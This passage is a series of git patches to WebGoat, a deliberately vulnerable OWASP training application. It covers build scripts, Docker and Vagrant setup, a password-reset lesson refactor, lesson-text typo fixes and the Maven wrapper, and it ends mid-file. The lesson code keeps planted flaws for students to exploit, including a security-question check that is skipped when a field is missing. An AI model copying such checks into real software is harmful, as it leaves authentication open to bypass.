org.owasp.webgoat; +import lombok.extern.slf4j.Slf4j; import org.hsqldb.server.Server; import org.springframework.beans.factory.annotation.Value; import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty; @@ -17,6 +18,7 @@ import javax.sql.DataSource; * JVM. This can only be done if you start a standalone HSQLDB. We need both WebWolf and WebGoat to use the same database */ @Configuration +@Slf4j @ConditionalOnProperty(prefix = "webgoat.start", name = "hsqldb", havingValue = "true") public class HSQLDBDatabaseConfig { @@ -27,7 +29,7 @@ public class HSQLDBDatabaseConfig { public Server hsqlStandalone(@Value("${webgoat.server.directory}") String directory, @Value("${hsqldb.silent:true}") boolean silent, @Value("${hsqldb.trace:false}") boolean trace) { - + log.info("Starting internal database on port {} ...", hsqldbPort); Server server = new Server(); server.setDatabaseName(0, "webgoat"); server.setDatabasePath(0, directory + "/data/webgoat"); diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java index 34bde941a..473114c0e 100644 --- a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java +++ b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java @@ -24,17 +24,22 @@ */ package org.owasp.webgoat; +import lombok.extern.slf4j.Slf4j; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; /** + * Main entry point, this project is here to get all the lesson jars included to the final jar file + * * @author nbaars * @date 2/21/17 */ @SpringBootApplication +@Slf4j public class StartWebGoat { public static void main(String[] args) { + log.info("Starting WebGoat with args: {}", args); SpringApplication.run(WebGoat.class, args); } } diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile index 060f6ee9a..2cdb1e708 100644 --- a/webwolf/Dockerfile +++ b/webwolf/Dockerfile @@ -9,6 +9,4 @@ RUN \ USER webwolf COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar -ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.port=9090", "--server.address=0.0.0.0"] - EXPOSE 9090 diff --git a/webwolf/pom.xml b/webwolf/pom.xml index 8bcddea79..bc2d30f0a 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT From bca8b3c650b2764ea139724c8b9e27c3437f78bf Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 8 Aug 2018 18:23:27 +0200 Subject: [PATCH 08/28] Fix buildscripts to wait for Docker and build snapshots --- scripts/build-all.sh | 14 ++++++++------ scripts/build_docker.sh | 4 ++-- scripts/clean-run-docker-compose.sh | 2 +- 3 files changed, 11 insertions(+), 9 deletions(-) diff --git a/scripts/build-all.sh b/scripts/build-all.sh index a4430802e..7835dff20 100644 --- a/scripts/build-all.sh +++ b/scripts/build-all.sh @@ -13,15 +13,17 @@ if [[ "${SUCCESS}" -eq 00 ]] ; then fi -#mvn clean install -#if [[ "$?" -ne 0 ]] ; then -# exit y$? -#fi +mvn clean install +if [[ "$?" -ne 0 ]] ; then + exit y$? +fi cd - sh build_docker.sh +if [[ "$?" -ne 0 ]] ; then + exit y$? +fi -echo "Do you want to run docker-compose?" while true; do read -p "Do you want to run docker-compose?" yn case ${yn} in @@ -29,4 +31,4 @@ while true; do [Nn]* ) exit;; * ) echo "Please answer yes or no.";; esac -done \ No newline at end of file +done diff --git a/scripts/build_docker.sh b/scripts/build_docker.sh index f63329476..a6df2a453 100644 --- a/scripts/build_docker.sh +++ b/scripts/build_docker.sh @@ -3,8 +3,8 @@ WEBGOAT_HOME=$(pwd)/../ cd ${WEBGOAT_HOME}/webgoat-server -docker build -t webgoat/webgoat-8.0 . +docker build -t webgoat/webgoat-v8.0.0.snapshot . cd ${WEBGOAT_HOME}/webwolf -docker build -t webgoat/webwolf . +docker build -t webgoat/webwolf-v8.0.0.snapshot . diff --git a/scripts/clean-run-docker-compose.sh b/scripts/clean-run-docker-compose.sh index c804d8d36..b1e493b87 100644 --- a/scripts/clean-run-docker-compose.sh +++ b/scripts/clean-run-docker-compose.sh @@ -2,4 +2,4 @@ cd .. docker-compose rm -f -docker-compose up +docker-compose -f docker-compose-local.yml up From 3d58049af6ba7de8176281e82337358d98c6a981 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 8 Aug 2018 18:26:12 +0200 Subject: [PATCH 09/28] docker-compose-local.yml now extends docker-compose.yml WebWolf waits for 8 seconds after WebGoat starts so the database connection can be established --- README.MD | 4 ++-- docker-compose-local.yml | 19 +++++++------------ docker-compose.yml | 4 ++-- 3 files changed, 11 insertions(+), 16 deletions(-) diff --git a/README.MD b/README.MD index 3290fbee4..238f9231f 100644 --- a/README.MD +++ b/README.MD @@ -104,7 +104,7 @@ server.address=x.x.x.x # Vagrant -We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed. +We supply a complete environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed. ```shell $ cd WebGoat/webgoat-images/vagrant-training @@ -112,7 +112,7 @@ We supply a complete development environment using Vagrant, to run WebGoat with ``` Once the provisioning is complete login to the Virtualbox with username vagrant and password vagrant. -The source code will be available in the home directory. +WebGoat and WebWolf will automatically start when you login to this image. # Building a new Docker image diff --git a/docker-compose-local.yml b/docker-compose-local.yml index f65bea120..d94544473 100644 --- a/docker-compose-local.yml +++ b/docker-compose-local.yml @@ -3,16 +3,11 @@ version: '2.1' services: webgoat: image: webgoat/webgoat-v8.0.0.snapshot - environment: - - WEBWOLF_HOST=webwolf - - WEBWOLF_PORT=9090 - ports: - - "8080:8080" - volumes: - - .:/home/webgoat/.webgoat - command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0 --server.port=8080" + extends: + file: docker-compose.yml + service: webgoat webwolf: - image: webgoat/webwolf-v8.0.0.snapshot - ports: - - "9090:9090" - command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" + extends: + file: docker-compose.yml + service: webwolf + image: webgoat/webwolf-v8.0.0.snapshot \ No newline at end of file diff --git a/docker-compose.yml b/docker-compose.yml index a4e888edb..27262211d 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -10,9 +10,9 @@ services: - "8080:8080" volumes: - .:/home/webgoat/.webgoat - command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0" + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.port=8080 --server.address=0.0.0.0" webwolf: image: webgoat/webwolf ports: - "9090:9090" - command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat" + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" From 580e50f5580c5062df4d75869301a9835d8e73f3 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 10 Aug 2018 13:15:40 +0200 Subject: [PATCH 10/28] Same form post is used and with autocomplete this does not work because all fields will be posted. The endpoint could no long distinguish between the different actions (sending e-mail and checking password) --- .../webgoat/plugin/SimpleMailAssignment.java | 34 ++++++++----------- .../main/resources/html/PasswordReset.html | 31 +++++++++++------ 2 files changed, 35 insertions(+), 30 deletions(-) diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java index bcd821743..a2c551687 100644 --- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java +++ b/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/SimpleMailAssignment.java @@ -4,7 +4,6 @@ import org.apache.commons.lang3.StringUtils; import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentPath; import org.owasp.webgoat.assignments.AttackResult; -import org.owasp.webgoat.plugin.PasswordResetEmail; import org.springframework.beans.factory.annotation.Value; import org.springframework.http.MediaType; import org.springframework.web.bind.annotation.PostMapping; @@ -14,8 +13,6 @@ import org.springframework.web.client.RestClientException; import org.springframework.web.client.RestTemplate; import java.time.LocalDateTime; -import java.util.Map; -import java.util.Optional; import static java.util.Optional.ofNullable; @@ -37,23 +34,10 @@ public class SimpleMailAssignment extends AssignmentEndpoint { @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE) @ResponseBody - public AttackResult sendEmail(@RequestParam Map json) { - String email = (String) json.get("emailReset"); - if (StringUtils.isEmpty(email)) { - email = (String) json.getOrDefault("email", "unknown@webgoat.org"); - } - String password = (String) json.getOrDefault("password", ""); - int index = email.indexOf("@"); - String username = email.substring(0, index == -1 ? email.length() : index); + public AttackResult login(@RequestParam String email, @RequestParam String password) { + String emailAddress = ofNullable(email).orElse("unknown@webgoat.org"); + String username = extractUsername(emailAddress); - if (StringUtils.isEmpty(password)) { - return sendEmail(username, email); - } else { - return checkPassword(password, username); - } - } - - private AttackResult checkPassword(String password, String username) { if (username.equals(getWebSession().getUserName()) && StringUtils.reverse(username).equals(password)) { return trackProgress(success().build()); } else { @@ -61,6 +45,18 @@ public class SimpleMailAssignment extends AssignmentEndpoint { } } + @PostMapping(consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE, value = "/reset") + @ResponseBody + public AttackResult resetPassword(@RequestParam String emailReset) { + String email = ofNullable(emailReset).orElse("unknown@webgoat.org"); + return sendEmail(extractUsername(email), email); + } + + private String extractUsername(String email) { + int index = email.indexOf("@"); + return email.substring(0, index == -1 ? email.length() : index); + } + private AttackResult sendEmail(String username, String email) { if (username.equals(getWebSession().getUserName())) { PasswordResetEmail mailEvent = PasswordResetEmail.builder() diff --git a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html b/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html index 708c4c07f..e8e00e828 100644 --- a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html +++ b/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html @@ -14,16 +14,18 @@
-
-
-
-
+
+ +
+
+
-

Account +

+ Account Access

@@ -41,7 +43,8 @@ Access

- + Forgot your password?

@@ -49,6 +52,12 @@
+ + +
-
+
- +


From f9a4061604f45575ae3623c03252322cefb98978 Mon Sep 17 00:00:00 2001 From: Jelle Besseling Date: Wed, 12 Sep 2018 09:54:44 +0200 Subject: [PATCH 11/28] Fix typo --- .../org/owasp/webgoat/plugin/AccountVerificationHelper.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java index dd9aaeee5..fe5b77828 100644 --- a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java +++ b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/plugin/AccountVerificationHelper.java @@ -58,7 +58,7 @@ public class AccountVerificationHelper { return false; } - if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("seQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) { + if (submittedQuestions.containsKey("secQuestion1") && !submittedQuestions.get("secQuestion1").equals(secQuestionStore.get(verifyUserId).get("secQuestion1"))) { return false; } From a2f28460c0d9e8b9dcdedc88506a594e20dd3ec5 Mon Sep 17 00:00:00 2001 From: donkrasnov <42833573+donkrasnov@users.noreply.github.com> Date: Thu, 30 Aug 2018 12:20:55 +0300 Subject: [PATCH 12/28] Update password_reset.html Without this attribute it is impossible to pass the lesson "password-reset" `Email functionality with WebWolf`. --- .../src/main/resources/templates/password_reset.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html b/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html index 28c7c2f58..a5c3647b7 100644 --- a/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html +++ b/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html @@ -9,7 +9,7 @@
-
+
@@ -29,4 +29,4 @@
- \ No newline at end of file + From b6e4995d119dd0b6e1e159bc8272efe082e1457a Mon Sep 17 00:00:00 2001 From: Chirag Jariwala Date: Wed, 5 Sep 2018 11:27:20 +0530 Subject: [PATCH 13/28] Fixed Vagrant file - Added correct wget urls for .jar files - changed server address to 0.0.0.0(pointing to all interfaces) because by default it listens for connections on VM's localhost only but we want to access webgoat on NAT adapter via port forwarding --- webgoat-images/vagrant-training/Vagrantfile | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/webgoat-images/vagrant-training/Vagrantfile b/webgoat-images/vagrant-training/Vagrantfile index 4772a8904..47811f8a6 100644 --- a/webgoat-images/vagrant-training/Vagrantfile +++ b/webgoat-images/vagrant-training/Vagrantfile @@ -19,17 +19,17 @@ Vagrant.configure(2) do |config| end config.vm.provision "shell", inline: <<-SHELL - wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar - wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar + wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webgoat-server-8.0.0.M21.jar + wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M21/webwolf-8.0.0.M21.jar sudo add-apt-repository ppa:openjdk-r/ppa sudo apt-get update sudo apt-get install openjdk-8-jre -y SHELL config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL - java -jar webgoat-server-8.0.0.RELEASE.jar & + java -jar webgoat-server-8.0.0.M21.jar --server.address=0.0.0.0 & sleep 40s - java -jar webwolf-8.0.0.RELEASE.jar + java -jar webwolf-8.0.0.M21.jar --server.address=0.0.0.0 & SHELL end From 1520c7571fbf3fdd78876c40640238c70c27e064 Mon Sep 17 00:00:00 2001 From: Josh Cummings Date: Fri, 5 Oct 2018 14:01:52 -0600 Subject: [PATCH 14/28] HTML Tampering Mitigation Description Typo --- .../main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc b/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc index 22eb72fa2..a7f238924 100755 --- a/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc +++ b/webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en/HtmlTampering_Mitigation.adoc @@ -1,6 +1,6 @@ === Mitigation -In this simple example you noticed that the price is calculated server side and send to the server. The server +In this simple example you noticed that the price is calculated client-side and sent to the server. The server accepted the input as a given and did not calculate the price again. One of the mitigations in this case is to look up the price of the television in your database and calculate the total price again. From ecbbb5258ee604a8d107ebbbbdfaf055828a3e1c Mon Sep 17 00:00:00 2001 From: Joubin Jabbari Date: Sun, 7 Oct 2018 11:15:01 -0700 Subject: [PATCH 15/28] encapsulated the WEBGOAT_HOME in quotes Encapsulating the `WEBGOAT_HOME` variable in quotes allows for spaces to exist in the path --- scripts/build_docker.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scripts/build_docker.sh b/scripts/build_docker.sh index a6df2a453..ec5f28d9f 100644 --- a/scripts/build_docker.sh +++ b/scripts/build_docker.sh @@ -2,9 +2,9 @@ WEBGOAT_HOME=$(pwd)/../ -cd ${WEBGOAT_HOME}/webgoat-server +cd "${WEBGOAT_HOME}"/webgoat-server docker build -t webgoat/webgoat-v8.0.0.snapshot . -cd ${WEBGOAT_HOME}/webwolf +cd "${WEBGOAT_HOME}"/webwolf docker build -t webgoat/webwolf-v8.0.0.snapshot . From f81a6852dbf9951d6baf5aa05d5abac909b7a54e Mon Sep 17 00:00:00 2001 From: Patrick Double Date: Sat, 3 Nov 2018 08:38:06 -0500 Subject: [PATCH 16/28] YAML structure fix, postgres version fix The structure of the environment was incorrect. The postgres dialect doesn't match the postgres:latest image. --- docker-compose-postgres.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/docker-compose-postgres.yml b/docker-compose-postgres.yml index 56c9a707c..2ff77f0b5 100644 --- a/docker-compose-postgres.yml +++ b/docker-compose-postgres.yml @@ -12,8 +12,8 @@ services: - spring.datasource.password=webgoat - spring.datasource.driver-class-name=org.postgresql.Driver - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect - - webgoat.server.directory=/home/webgoat/.webgoat/ - - webgoat.user.directory=/home/webgoat/.webgoat/ + - webgoat.server.directory=/home/webgoat/.webgoat/ + - webgoat.user.directory=/home/webgoat/.webgoat/ ports: - "8080:8080" webwolf: @@ -26,9 +26,8 @@ services: - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect ports: - "9090:9090" - db: - container_name: webgoat_db - image: postgres:latest + webgoat_db: + image: postgres:9.4 # Uncomment to store the state of the database on the host. # volumes: # - ./database:/var/lib/postgresql From bf45a0a8e5c7e8cd8d035f40c80cea86350e5373 Mon Sep 17 00:00:00 2001 From: Bartosz Bogatko Date: Sun, 18 Nov 2018 13:18:01 +0100 Subject: [PATCH 17/28] Fix for XXE docs --- .../xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc index e269ec948..4b8b0f3f7 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc @@ -2,6 +2,7 @@ An XML Entity allows tags to be defined that will be replaced by content when the XML Document is parsed. In general there are three types of entities: + * internal entities * external entities * parameter entities. @@ -34,6 +35,7 @@ may be exploited by dereferencing a malicious URI, possibly allowing arbitrary c local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released. In general we can distinguish the following kind of XXE attacks: + * Classic: in this case an external entity is included in a local DTD * Blind: no output and or errors are shown in the response * Error: try to get the content of a resource in the error message \ No newline at end of file From dd1009bc546567a4f363a2fe2fd727b07f2c48d5 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 14 Dec 2018 12:56:21 +0100 Subject: [PATCH 18/28] Add Maven wrapper --- .mvn/wrapper/maven-wrapper.properties | 1 + mvnw | 286 ++++++++++++++++++++++++++ mvnw.cmd | 161 +++++++++++++++ 3 files changed, 448 insertions(+) create mode 100644 .mvn/wrapper/maven-wrapper.properties create mode 100755 mvnw create mode 100644 mvnw.cmd diff --git a/.mvn/wrapper/maven-wrapper.properties b/.mvn/wrapper/maven-wrapper.properties new file mode 100644 index 000000000..717934671 --- /dev/null +++ b/.mvn/wrapper/maven-wrapper.properties @@ -0,0 +1 @@ +distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.5.4/apache-maven-3.5.4-bin.zip diff --git a/mvnw b/mvnw new file mode 100755 index 000000000..5551fde8e --- /dev/null +++ b/mvnw @@ -0,0 +1,286 @@ +#!/bin/sh +# ---------------------------------------------------------------------------- +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# ---------------------------------------------------------------------------- + +# ---------------------------------------------------------------------------- +# Maven2 Start Up Batch script +# +# Required ENV vars: +# ------------------ +# JAVA_HOME - location of a JDK home dir +# +# Optional ENV vars +# ----------------- +# M2_HOME - location of maven2's installed home dir +# MAVEN_OPTS - parameters passed to the Java VM when running Maven +# e.g. to debug Maven itself, use +# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +# MAVEN_SKIP_RC - flag to disable loading of mavenrc files +# ---------------------------------------------------------------------------- + +if [ -z "$MAVEN_SKIP_RC" ] ; then + + if [ -f /etc/mavenrc ] ; then + . /etc/mavenrc + fi + + if [ -f "$HOME/.mavenrc" ] ; then + . "$HOME/.mavenrc" + fi + +fi + +# OS specific support. $var _must_ be set to either true or false. +cygwin=false; +darwin=false; +mingw=false +case "`uname`" in + CYGWIN*) cygwin=true ;; + MINGW*) mingw=true;; + Darwin*) darwin=true + # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home + # See https://developer.apple.com/library/mac/qa/qa1170/_index.html + if [ -z "$JAVA_HOME" ]; then + if [ -x "/usr/libexec/java_home" ]; then + export JAVA_HOME="`/usr/libexec/java_home`" + else + export JAVA_HOME="/Library/Java/Home" + fi + fi + ;; +esac + +if [ -z "$JAVA_HOME" ] ; then + if [ -r /etc/gentoo-release ] ; then + JAVA_HOME=`java-config --jre-home` + fi +fi + +if [ -z "$M2_HOME" ] ; then + ## resolve links - $0 may be a link to maven's home + PRG="$0" + + # need this for relative symlinks + while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. + + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" + # TODO classpath? +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`which java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." +fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar" + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + wget "$jarUrl" -O "$wrapperJarPath" + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... using curl" + fi + curl -o "$wrapperJarPath" "$jarUrl" + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." + fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." + fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git a/mvnw.cmd b/mvnw.cmd new file mode 100644 index 000000000..e5cfb0ae9 --- /dev/null +++ b/mvnw.cmd @@ -0,0 +1,161 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM http://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven2 Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 